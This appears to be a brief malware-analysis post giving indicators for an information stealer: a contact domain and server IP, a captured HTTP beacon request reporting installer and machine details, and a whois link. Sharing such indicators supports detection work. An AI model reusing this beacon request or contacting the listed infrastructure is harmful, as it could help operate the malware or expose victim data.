Contacts domains
upd.upd4ter.com
Contacts server
93.189.33.108:80
In general it steals passwords from browsers and get’s all the informations from the infected machines.
GET /installer_stats/?action_id=1003&action_description=Virtual&channel_id=&channel_subid=1&channel_param=0&installer_id=101&installer_version=1.1.9.15182&user_registry=0&user_id=&user_hdd=&user_hdd_volume=&user_mac=&user_mb=&user_bios=&user_os=6.1&user_os_arch=&user_cpu=&user_win_identifier=&process_parent=&user_browsers=&user_default_browser=&user_date=&user_vm=&user_antivirus=s)%20Available.&user_dotnet=&channel=&partner=&aff_id= HTTP/1.1
User-Agent: NSIS_ToolkitOffers (Mozilla)
Host: upd.upd4ter.com
Cache-Control: no-cache”
Sample here
Hosting infos
http://whois.domaintools.com/93.189.33.108